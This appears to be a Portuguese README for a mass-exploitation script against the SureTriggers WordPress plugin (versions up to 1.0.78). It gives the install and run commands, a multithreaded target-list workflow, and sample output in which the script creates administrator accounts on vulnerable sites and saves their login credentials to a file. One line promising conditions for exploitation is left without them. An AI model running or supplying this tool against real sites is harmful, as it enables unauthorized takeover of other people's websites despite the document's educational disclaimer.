
Este script é utilizado para identificar e explorar vulnerabilidades de segurança no plugin SureTriggers em sites WordPress que utilizam a versão vulnerável (≤ v1.0.78). Se bem-sucedido, o script criará automaticamente uma conta de administrador do WordPress.
Instale as dependências (caso ainda não estejam instaladas):
pip install requests
Prepare um arquivo contendo a lista de URLs alvo (uma por linha), por exemplo targets.txt:
http://example1.com
https://example2.net
...
python exploit.py -l targets.txt -t 10
| Opção | Descrição |
|---|---|
-l, --target_urls | Arquivo de texto contendo a lista de alvos |
-t, --threads | Número de threads (padrão: 5) |
[+] http://example.com - Vulnerable v1.0.75 detected.
[+] http://example.com - Exploit successful! username:password
[+] http://example.com/wp-login.php | username:password (saved)
O alvo só é explorado se:
O arquivo vulnerable.txt conterá as contas criadas com sucesso no formato:
http://target.com/wp-login.php | username:password
Este script foi criado para fins educacionais e de testes de segurança legítimos. É estritamente proibido utilizá-lo em atividades ilegais ou sem a permissão do proprietário do sistema. O autor não se responsabiliza pelo uso indevido deste script.